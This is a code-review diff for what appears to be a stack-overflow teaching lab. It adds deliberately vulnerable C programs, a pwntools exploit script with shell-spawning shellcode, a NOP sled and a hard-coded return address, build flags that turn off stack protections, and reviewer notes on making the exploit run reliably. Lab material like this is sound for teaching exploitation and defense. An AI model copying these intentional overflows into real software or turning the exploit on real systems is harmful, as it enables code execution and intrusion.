Showing
6 changed files
with
161 additions
and
0 deletions.
@@ -0,0 +1,24 @@ | ||
#include <stdio.h> | ||
#include <string.h> | ||
#include <unistd.h> | ||
|
||
int BUFFER=200; | ||
|
||
int copy(char* input){ | ||
char buffer[BUFFER]; | ||
strcpy(buffer, input); | ||
|
||
} | ||
|
||
int main(int argc, char* argv[]){ | ||
/* Main Function*/ | ||
char buf[400]; | ||
printf("Smash The Stack\n"); | ||
//Get the data | ||
int r; | ||
r = read(0, buf, 400); //Save Version | ||
|
||
int out = copy(buf); | ||
printf("Lose :(\n"); | ||
return 0; | ||
} |
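Review bot: `copy` is declared `int` but has no `return` statement, and `main` stores its result in `out`, so the program reads an indeterminate value on top of the overflow it is meant to show; declare it `void copy(char *input)` and call it as `copy(buf);` (gcc flags the current form under `-Wreturn-type`). The `read()` count `r` is never checked and `buf` is never NUL-terminated, so `strcpy` keeps copying whatever uninitialized stack follows `buf` when no NUL arrives in the input — acceptable for a lab target, but a comment such as `/* deliberate: unbounded strcpy, input not NUL-terminated, no length check */` would separate the intended bug from accidental ones. Because `BUFFER` is a non-const global, `buffer[BUFFER]` is a variable-length array, so the frame layout (and any offset to the saved return address measured against it) may depend on compiler and optimisation level; `enum { BUFFER = 200 };` would make it a fixed-size array with a stable layout.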
@@ -0,0 +1,61 @@ | ||
from pwn import * | ||
|
||
#Update the Context with the Architecture and OS | ||
context.update(arch="i386", os="linux") | ||
|
||
#Create a Process Object to talk to. This should be our Target Binary | ||
p = process("./classic") | ||
|
||
# Do an initial read to get the welcome message | ||
data = p.read() | ||
print(data) #For Debugging | ||
|
||
raw_input("Attach GDB and press enter") #More debugging | ||
|
||
|
||
# And add our Shellcode | ||
|
||
#shellcode ="".join(["\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46", | ||
# "\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68", | ||
# "\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"]) | ||
|
||
#shellcode = "".join(["\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70", | ||
# "\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61", | ||
# "\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52", | ||
# "\x51\x53\x89\xe1\xcd\x80"]) | ||
shellcode = asm(shellcraft.sh()) | ||
print(shellcraft.sh()) | ||
|
||
|
||
# Offset to EIP (You need to calculate this) | ||
OFFSET = 236 | ||
|
||
#Address we want to jump to (You need to supply this) | ||
#Pwntools will automatically convert to the correct endianness | ||
#TARGET_ADDRESS = p32(0xffffd080) | ||
TARGET_ADDRESS = p32(0x0804901d) | ||
#TARGET_ADDRESS = "BBBB" | ||
|
||
|
||
#Now we will build our payload | ||
|
||
PADD = 150 | ||
payloadLen = OFFSET - len(shellcode) #How many 'A's to Pad with | ||
payloadLen = payloadLen - PADD #I like a bit of space below the shellcode too | ||
|
||
payload = "\x90"*payloadLen | ||
payload += shellcode #Add Shellcode | ||
payload += "\x90"*PADD#30 #More Nops | ||
payload += TARGET_ADDRESS #Address to Jump to | ||
|
||
print("PAYLOAD {0} \n{1}".format(payload, len(payload))) | ||
p.writeline(payload) #Write it to the Binary | ||
p.interactive() #Go into interactive mode. | ||
|
||
#34 is OK, > 34 Crashses | ||
|
||
|
||
|
||
#Compile With | ||
#gcc -m32 -fno-stack-protector -z execstack -no-pie classic.c -o classic | ||
|
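Review bot: The payload assembly mixes `str` (`"\x90"*payloadLen`, `"\x90"*PADD`) with the `bytes` that `asm()` and `p32()` return under Python 3 pwntools, so on any 4.x install this raises `TypeError` before anything is sent; `raw_input` is likewise Python 2 only. If the script should run on current pwntools, use byte literals for the NOP sleds, `input()` for the pause, and print `len(payload)` on its own rather than formatting raw bytes into a string. The commented stack address `0xffffd080` only holds with ASLR disabled and with the same environment and argv as the run that measured it, which a gdb session does not guarantee; a comment saying so would save the next user a confusing session. The trailing `#34 is OK, > 34 Crashses` note appears stale relative to `OFFSET = 236` and should be removed or explained.
```python
input("Attach GDB and press enter")  # More debugging
# … unchanged: shellcode, OFFSET, TARGET_ADDRESS, PADD, payloadLen …
payload = b"\x90" * payloadLen
payload += shellcode            # Add Shellcode
payload += b"\x90" * PADD       # More Nops
payload += TARGET_ADDRESS       # Address to Jump to
print("PAYLOAD len={0}".format(len(payload)))
print(payload)
# … unchanged: writeline / interactive …
```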
@@ -0,0 +1,13 @@ | ||
# Build the first overflow target | ||
|
||
CC = gcc | ||
CFLAGS = -m32 -g -z execstack | ||
|
||
|
||
firstOverflow: firstOverflow.c | ||
|
||
$(CC) $(CFLAGS) firstOverflow.c -o firstOverflow | ||
|
||
|
||
all: firstOverflow | ||
|
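Review bot: `CFLAGS` omits `-fno-stack-protector` and `-no-pie`, unlike the `gcc -m32 -fno-stack-protector -z execstack -no-pie` line recorded for the other target on this page; on toolchains that enable stack protection and PIE by default, the protector reorders `main`'s locals so the char array sits above scalars such as a function pointer (out of reach of the overflow), and PIE makes any address printed by one run invalid for the next. Suggest `CFLAGS = -m32 -g -z execstack -fno-stack-protector -no-pie`, with a comment that these flags exist to make the exercise reproducible rather than being an accident. `-z execstack` is not needed for a target that is exploited by redirecting control to an existing function, though it is harmless; and `all` is listed after `firstOverflow`, so it is not the default goal — move it first or rely on the fact that the two coincide here.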
@@ -0,0 +1,43 @@ | ||
#include <stdio.h> | ||
#include <stdlib.h> | ||
#include <string.h> | ||
#include <unistd.h> | ||
|
||
int BUFFER=150; | ||
|
||
void win(void){ | ||
/*Win Condition | ||
We Want to jump here | ||
*/ | ||
printf("\n ===== Win ===== \n\n"); | ||
system("/bin/sh"); //Tradition to get a shell | ||
} | ||
|
||
void lose(void){ | ||
/* Lose Condition */ | ||
printf("Current Memory Address is %p\n",lose); | ||
printf("Aim for %p\n", win); | ||
printf("Lose :(\n"); | ||
} | ||
|
||
int main(int argc, char* argv[]){ | ||
/* Main Function*/ | ||
|
||
//Pointer to the lose function | ||
void (*fp)(void) = lose; | ||
|
||
char buffer[BUFFER]; | ||
printf("Overflow the Buffer\n"); | ||
|
||
if (argc != 2){ | ||
printf("Overflow the buffer\n"); | ||
printf("Hint! Try `python -c \"print 'A'*100\"`\n"); | ||
return -1; | ||
} | ||
|
||
memcpy(buffer, argv[1], strlen(argv[1])); | ||
printf("Off to %p\n",fp); | ||
fp(); | ||
|
||
return 0; | ||
} |
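Review bot: `char buffer[BUFFER]` with `BUFFER` a non-const global is a variable-length array, so where the compiler places it relative to `fp` is decided at run time and may differ between compilers and optimisation levels; if the exercise relies on the overflow reaching `fp`, `enum { BUFFER = 150 };` gives a fixed-size array with a predictable frame. `win()` runs `system("/bin/sh")`; if this binary is ever installed setuid for a lab, some shells drop the effective uid on start (bash does unless invoked with `-p`), so the usual pattern is `setresuid(geteuid(), geteuid(), geteuid());` before the call, with a comment explaining why. The `memcpy` with `strlen(argv[1])` is the intended unbounded copy, but a one-line `/* deliberate: no bound check — this is the overflow */` would make that explicit, and the hint on the usage path is Python 2 syntax (`python3 -c "print('A'*100)"` matches current systems).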
@@ -0,0 +1,11 @@ | ||
int add(int var1, int var2){ | ||
//Add two numbers | ||
int total; | ||
total = var1+var2; | ||
return total; | ||
} | ||
|
||
void main(int argv, char* argc){ | ||
//Function call | ||
int total = add(10, 20); | ||
} |
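Review bot: `main` is declared `void main(int argv, char* argc)` — the parameter names are swapped and the second should be `char *argv[]`; `void main` is not a valid hosted-C signature, and since `total` is never used, an optimising build may drop the `add` call that this file appears to exist to demonstrate. Suggest `int main(int argc, char *argv[])` with `return add(10, 20);` (or a `printf` of the result) so the call survives, plus a header comment `/* Minimal call/return example for inspecting the prologue and epilogue in a disassembler; build with -O0 */`.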
@@ -0,0 +1,9 @@ | ||
#include <stdio.h> | ||
#include <string.h> | ||
|
||
void main(void){ | ||
char theString[15]; | ||
//Copy a String that is longer than the space allocated | ||
strcpy(theString, "Hello World, This Is A Long String"); | ||
printf("%s", theString); | ||
} |
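Review bot: The 34-character literal copied into `theString[15]` is the intended overflow, but on glibc builds where `_FORTIFY_SOURCE` is in effect (commonly enabled by default at `-O1` and above on several distributions) `strcpy` is rewritten to `__strcpy_chk` and the program aborts with `*** buffer overflow detected ***` instead of showing the corrupted stack; a comment stating that it must be built with `-O0` or `-U_FORTIFY_SOURCE` (and `-fno-stack-protector`) to observe the effect would prevent that surprise. `void main(void)` should be `int main(void)`. The `printf` has no trailing newline, so on a line-buffered terminal its output may still be sitting in the stdio buffer when the corrupted return address crashes the process — `printf("%s\n", theString);` or an explicit `fflush(stdout);` makes the output observable before the crash.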